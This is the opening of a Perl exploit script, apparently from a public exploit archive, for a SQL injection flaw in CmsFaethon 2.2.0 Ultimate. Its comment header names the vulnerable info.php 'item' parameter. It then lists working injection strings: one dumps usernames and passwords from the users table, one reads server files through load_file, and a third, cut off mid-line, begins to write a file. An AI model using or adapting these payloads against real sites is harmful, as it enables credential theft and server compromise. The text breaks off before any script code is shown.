1 #!/usr/bin/perl
2
3 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
4 # | INFORMATIONS
|
5 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
6 # |Web Application : CmsFaethon 2.2.0 Ultimate
|
7 # |Download : http://garr.dl.sourceforge.net/sourceforge/cmsfaethon/cmsfaethon−2.2.0−ultimate.zip
|
8 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
9 # |Remote SQL Command Injection Exploit
|
10 # |by Osirys
|
11 # |osirys[at]autistici[dot]org
|
12 # |osirys.org
|
13 # |Greets to: evilsocket, Fireshot, Todd and str0ke
|
14 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
15 # |BUG [Sql Injection]
16 # | p0c : /[path]/info.php?item=[sql_string]
17 # |SQL Injections used by this sploit :
18 # |[1] /path]/info.php?item=−2’ union all select concat(username,0x3a,password),0 from f06_users order by ’*
19 # |[2] /path]/info.php?item=−2’ union all select load_file(’lf’),0 order by ’*
20 # |[3] /path]/info.php?item=−2’ union all select ’co